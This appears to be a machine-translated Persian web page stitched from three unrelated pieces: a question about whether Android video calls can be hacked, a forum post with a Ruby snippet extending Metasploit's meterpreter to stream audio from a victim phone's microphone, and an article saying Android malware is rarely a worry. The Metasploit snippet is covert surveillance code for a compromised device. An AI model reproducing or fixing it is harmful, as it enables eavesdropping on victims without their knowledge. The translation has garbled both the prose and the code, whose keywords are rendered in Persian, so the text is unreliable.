اندروید – امکان هک شدن ویدیوها

فرض کنید 2 نفر تماس ویدیویی خصوصی با تلفن های اندروید دارند (Viber / WhatsApp) … احتمال این که تماس های ویدئویی را می توان هک کرده و در اینترنت آپلود کرد ……

هیچ حزبی هر ضبطی انجام داده است … و هیچ ویدیو ذخیره شده در هر دو گوشی وجود ندارد … احتمال این است که در هنگام تماس ویدیویی زنده شخص به تماس هک شد و سپس آن را ضبط کرد؟ ..

ویرایش: در پاسخ به نظر در زیر … من مقاله ایمیلی درباره ایمیلی خوندم و پس از آن پارانوئید شدم و فقط فکر کردم اگر امکان داشت که تماس ویدیویی در آن لحظه هک شد …. من نمی دانم چه چیزی پرچم های قرمز این است که باید به چنین شرایطی نگاه کرد. امیدوارم این مسئله باعث شود که این سوال بیشتر روشن شود …. اگر در مورد سوال من جزئیات کافی نداشته باشم، عذرخواهی می کنم … اما واقعا مطمئن نیستم که جزئیات بیشتری به چه چیزی نیاز دارم اضافه کردن

EDIT 2: نگرانی اصلی من این بود که برخی از برنامه ها در تلفن های ما و یا برخی از شخص ثالث می توانستند ضبط زنده تماس ویدیویی و آپلود آن در وبسایت؟ … هیچ یک از تلفن ها در شبکه عمومی نبودند … بنابراین من نگران نداشتم … من می خواستم این امکان را به وجود بیاورم و این که چقدر احتمال دارد. ..شما این را کمی روشن تر می کنید …

اندروید – نحوه پخش صوت از تلفن قربانی با اسکریپت metasploit ruby

من می خواهم جریان صوتی میکروفون را در metasploit مانند webcam_stream ایجاد کنم، بنابراین برخی از کدها را به اسکریپت ruby ​​اضافه کردم: (/ usr / share / metasploit-framework / lib / rex / post / meterpreter / ui / console / command_dispatcher / stdapi / webcam.rb )، قطعه کد اضافه شده است:

 def cmd_mic_stream (* args)

print_status ("شروع ...")
stream_path = Rex :: Text.rand_text_alpha (8) + ".wav"
player_path = Rex :: Text.rand_text_alpha (8) + ".html"
مدت زمان = 2
view = true
وقفه = 1800

record_mic_opts = Rex :: Parser :: Arguments.new (
  "-h" => [ false, "Help Banner" ]
  "-d" => [ true, "The stream duration in seconds (Default:2)" ]، # 1/30 دقیقه
  "-s" => [ true, "The stream file path (Default: '#{stream_path}')" ]
  "-t" => [ true, "The stream player path (Default: #{player_path})"]
  "-v" => [ true, "Automatically view the stream (Default: '#{view}')" ]
)

 record_mic_opts.parse (args) انجام دهید، _idx، val |
  انتخاب مورد
  وقتی "-h"
    print_line ("استفاده: record_mic [options]  n")
    print_line ("ضبط صدا از پیش فرض میکروفون")
    print_line (record_mic_opts.usage)
    برگشت
  وقتی "-d"
    مدت زمان = val.to_i
  وقتی "-s"
    stream_path = val
  وقتی "-t"
    player_path = val
  وقتی "-v"
    نمایش = true اگر val = ~ / ^ (f | n | 0) / i
  پایان
پایان

print_status ("آماده سازی بازیکن ...")
<! -
    html =٪ | 



 Metasploit webcam_stream - # {client.sock.peerhost} 




 هدف IP: # {client.sock.peerhost}
زمان شروع: # {Time.now}
وضعیت: 

www.metasploit.com


|
->

:: فایل.open (player_path، 'wb') do | f |
  f.write (html)
پایان
اگر دید
  print_status ("باز کردن بازیکن در: # {player_path}")
  Rex :: Compat.open_file (player_path)
چیز دیگری
  print_status ("لطفا به صورت دستی با مرورگر باز شود: # {player_path}")
پایان

print_status ("جریان ...")
شروع
  :: Timeout.timeout (timeout) انجام دهید
    در حالی که مشتری انجام می دهد
      data = client.webcam.record_mic (مدت زمان)
      اگر داده
         :: فایل.open (stream_path، 'wb') do | d |
         d.write (داده ها)
        پایان
        داده ها = nil
        خواب (5)
      پایان
    پایان
  پایان
نجات :: زمان بندی :: خطا
پایان

print_status ("متوقف شد")
پایان

شما ممکن است متوجه شوید که آن را به فرمان webcam_stream شبیه است، مشکل اینجاست که مرورگر باز می شود، وضعیت خروجی «پخش» می شود، اما صوتی چیزی را بازی نمی کند، فقط چیزی که ممکن است باعث آن شود خالی است؟

چرا ویروس ها در اندروید واقعا یک مسئله نیستند

معمولا توصیه می شود که آندروید یک مشکل ویروس دارد. اما در حالی که ویروس ها و بدافزارها در Android است، واقعا چیزی نیست که شما باید نگران آن باشید – تا زمانی که به آن توجه داشته باشید آنچه شما انجام می دهید.

Android به طور ذاتی امن است

آندروید خود یک سیستم عامل بسیار امن است – یک بیانیه است که تنها در طول چند سال گذشته درست است. درست از جعبه، تمام گوشی های اصلی آندرویدی دارای یک بوت لودر قفل شده برای جلوگیری از دسترسی به پارتیشن سیستم است. "بارگیری سفارشی" برنامه های غیر تایید شده نیز به طور پیش فرض غیر فعال شده است.

این دو (بوت لودر قفل شده و برنامه های بارگیری سفارشی)، روش های رایج ترین استفاده از بدافزار در دستگاه های اندرویدی خود هستند و هر دو به صورت پیش فرض مسدود شده اند. واقعیت این است که مهمترین مسائل مربوط به نرم افزارهای مخرب آندروید فقط به این دلیل است که برخی از ویژگی های امنیتی پیش فرض غیر فعال شده اند. متأسفم، این یکی از موارد اصلی است که Android را از رقابت جدا می کند. شما آزاد هستید که بیشتر از آنچه که با گوشی خود می خواهید انجام دهید، حتی اگر این به معنی امنیت تضعیف شده است.

به همین دلیل، گوگل حتی با Android Oreo امنیت بیشتری داشته است. در عوض این ویژگی یک تنظیم پدری است که به سادگی برنامههای نصب شده را از خارج از فروشگاه Play اجازه میدهد یا آنها را غیرفعال میکند، در حال حاضر براساس برنامه بر اساس برنامه عمل میکند. به این معناست که می توانید برنامه ها را از چیزی مانند Amazon Appstore نصب کنید، اما هیچ چیز دیگری نیست. این یک راه هوشمند برای رسیدگی به این تنظیم است.

به سادگی: اگر شما هرگز در باز کردن قفل بوت لودر (که حتی ممکن است در بسیاری از تلفن ها) و یا برنامه های بارگذاری sidelone برنامه، شما به عنوان محافظت می شود که شما می توانید توسط سیستم

بقیه، با این حال، شما را کمی دقت بررسی کنید از شما.

Google Play نرم افزار محافظت اسکن، اما آن را کامل نیست

Google دارای یک سیستم است که همه برنامهها را در فروشگاه Play (و تلفن شما) اسکن میکند. این به نام Google Play Protect نامگذاری شده است.

مرتبط با: چگونه از تروجان بر روی آندروید اجتناب کنید

اما مانند هر اسکنر بدافزار، آن را به عنوان همیشه، همیشه، اسکن حفاظت از نرم افزارهای مخرب برای گوشی شما. کامل نیست چیزهایی که انجام می دهند از طریق ترک ها گول می زنند، و گاهی این برنامه های مخرب ده ها هزار بار بارگیری شده اند تا آنها کشف شوند. این نوع از چیزهایی است که تصور می شود که اندروید یک سیستم عامل آلوده به بدافزار است که تحت پوشش رسانه ها محسوب می شود.

و در حالی که این اتفاق می افتد، این نیز یک تصویر ناعادلانه از Android به عنوان یک کل است. ما در مورد چگونگی جلوگیری از بدافزار در Android صحبت کردیم، اما یک نکته کلیدی است که ارزش آنرا تکرار می کنیم: توجه کنید. این واقعا همه چیز آنجاست. اطمینان حاصل کنید که توسعه دهنده مشروع است، توضیحات را بخوانید، به تصاویر نگاه کنید و نظرات را بررسی کنید.

در کل، اینها چیزهایی هستند که باید قبل از نصب یک برنامه (و نه فقط در Android) انجام شود، و این واقعا اینقدر طول نمی کشد که انجام شود شانس برنامه ای است که در حال برنامه ریزی در مورد نصب است مشروع است و شما چیزی برای نگرانی در مورد، اما گرفتن چند دقیقه برای خواندن بر روی جزئیات قبل از نصب تفاوت بین گرفتن برنامه شما به دنبال و نصب یک مخرب قطعه نرم افزار

مرتبط: نحوه قرار دادن (و اجتناب از) نرم افزارهای جعلی Android در فروشگاه Play

و نه، شما نیازی به نصب برنامه آنتی ویروس ندارید

بسیاری از بسیاری از شرکت های آنتی ویروس بر روی «مشکل ویروس» اندرویدی با انتشار برنامه های اسکن بدافزار برای این پلتفرم سرمایه گذاری کرده اند. اشتباه نکنید – این جالب است که اینها یک گزینه هستند! اما آنها واقعا نمی خواهند چیزی را پیدا کنند که گوگل قبلا آن را نمی داند و با محافظت از Play Protection محافظت می کند.

البته اکثر برنامه های آنتی ویروس در اندروید چیزهای دیگری مانند مسدود کردن تماس های تلفنی هرزنامه، محافظت تلفن شما از سرقت و موارد دیگر. اینها مزایای اضافه شده است، اما آنها همچنین دارای ویژگی های آندروید است که در حال حاضر ساخته شده است.

به طور واضح آن، اگر آن را به شما احساس بهتر است، شما می توانید از یک برنامه آنتی ویروس استفاده کنید، اما همه شما واقعا انجام می دهید اجازه می دهد برخی از سوم برنامه -party برای استفاده از منابع انجام آنچه تلفن خود را در حال حاضر خود را انجام می دهد. این بسیار حساس نیست.

اگر فقط کمی توجه خود را به آنچه که از Google Play نصب می کنید، به خوبی خواهید بود. این واقعا همه چیز آنجاست.